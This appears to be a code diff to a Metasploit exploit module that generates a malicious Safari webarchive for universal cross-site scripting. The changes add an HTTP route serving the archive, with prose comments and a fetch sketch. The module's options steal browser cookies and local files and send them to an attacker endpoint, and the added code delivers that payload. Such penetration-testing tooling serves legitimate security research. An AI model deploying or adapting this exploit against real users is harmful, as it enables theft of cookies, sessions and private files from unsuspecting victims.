@@ -50,6 +50,7 @@ def initialize(info = {})
         OptString.new('FILENAME', [ true, 'The file name.', 'msf.webarchive' ]),
         OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://browserscan.rapid7.com/)' ]),
         OptString.new('URIPATH', [ false, 'The URI to receive the UXSS\'ed data', '/grab' ]),
+        OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarchive.', '/msf.webarchive' ]),
         OptString.new('FILE_URLS', [ false, 'Additional file:// URLs to steal.', '' ]),
         OptBool.new('STEAL_COOKIES', [ true, "Enable cookie stealing.", true ]),
         OptBool.new('STEAL_FILES', [ true, "Enable local file stealing.", true ]),
@@ -153,6 +154,20 @@ def start_http(opts={})
     @service_path = uopts['Path']
     @http_service.add_resource(uopts['Path'], uopts)
 
+    # Add a path from which the generated webarchive can be downloaded
+    uopts = {
+      'Proc' => Proc.new { |cli, req|
+        resp = Rex::Proto::Http::Response::OK.new
+        resp['Content-Type'] = 'application/x-webarchive'
+        resp.body = @xml.to_s
+        cli.send_response resp
+      },
+      'Path' => webarchive_download_url
+    }.update(opts['Uri'] || {})
+    @http_service.add_resource(webarchive_download_url, uopts)
+
+    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+
     # As long as we have the http_service object, we will keep the HTTP server alive
     while @http_service
       select(nil, nil, nil, 1)
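
Once the service is up, the new resource serves the archive at DOWNLOAD_URI with the application/x-webarchive content type. A quick sanity check of that endpoint, as a sketch (host, port, and path below are illustrative, not values taken from this commit):

    require 'net/http'

    # Fetch the served webarchive and confirm the advertised content type.
    res = Net::HTTP.get_response(URI('http://192.168.1.10:8080/msf.webarchive'))
    puts res['Content-Type']  # expected: application/x-webarchive
    File.binwrite('msf.webarchive', res.body) if res.is_a?(Net::HTTPSuccess)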
@@ -176,9 +191,10 @@ def on_request_uri(cli, request)
 
   # @return [String] contents of webarchive as an XML document
   def webarchive_xml
-    xml = webarchive_header
-    urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
-    xml << webarchive_footer
+    return @xml unless @xml.nil? # only compute the XML once
+    @xml = webarchive_header
+    urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
+    @xml << webarchive_footer
   end
 
   # @return [String] the first chunk of the webarchive file, containing the WebMainResource
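
One subtlety: the download Proc added to start_http above reads @xml directly, so it serves an empty body if webarchive_xml has not run yet. A defensive variant would call the memoized builder instead (a sketch for illustration, not the commit's code):

    'Proc' => Proc.new { |cli, req|
      resp = Rex::Proto::Http::Response::OK.new
      resp['Content-Type'] = 'application/x-webarchive'
      resp.body = webarchive_xml  # builds and caches @xml on first use
      cli.send_response resp
    },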
@@ -288,8 +304,9 @@ def webarchive_footer
   # NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
   # [a encodeObject:response forKey:@"WebResourceResponse"];
   def web_response_xml(script)
-    # this is a binary plist, but im too lazy to write a real encoder.
-    # ripped this straight out of a safari webarchive save.
+    # This is a serialized NSHTTPResponse; I'm too lazy to write a real
+    # encoder, so string interpolation it is.
+    # Ripped straight out of a webarchive save.
     script['content-length'] = script[:body].length
     whitelist = %w(content-type content-length date etag
                    Last-Modified cache-control expires)
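
The whitelist above keeps only cache-relevant headers before they are interpolated into the captured plist blob. A standalone sketch of that filtering step (the input hash is made up):

    # Keep only whitelisted headers, matching case-insensitively.
    whitelist = %w(content-type content-length date etag
                   last-modified cache-control expires)
    headers = { 'Content-Type' => 'text/javascript', 'X-Tracking' => 'id=123' }
    kept = headers.select { |k, _| whitelist.include?(k.downcase) }
    # => {"Content-Type"=>"text/javascript"}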
@@ -711,7 +728,7 @@ def all_script_urls(pages)
       end
     end
 
-  # @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
+  # @return [Array<Array<Hash>>] list of headers returned by cacheable remote javascripts
   def find_cached_scripts
     cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
       begin
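
The revised @return tag is easier to read with a concrete shape: one inner Array per page in URLS, each element a Hash describing a cached script. The keys below are inferred from web_response_xml's use of script[:body] and script['content-length'], and the values are invented:

    # Illustrative return value of find_cached_scripts
    [
      [ # scripts cacheable on the first page in URLS
        { :body => 'alert(1);', 'content-type' => 'text/javascript',
          'content-length' => 9 }
      ],
      []  # a page that exposed no cacheable scripts
    ]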
@@ -780,6 +797,11 @@ def backend_url
     "#{proto}://#{myhost}#{port_str}"
   end
 
+  # @return [String] URL path that serves the malicious webarchive
+  def webarchive_download_url
+    @webarchive_download_url ||= datastore["DOWNLOAD_URI"]
+  end
+
   # @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
   # via the FILE_URLS module option.
   def interesting_file_urls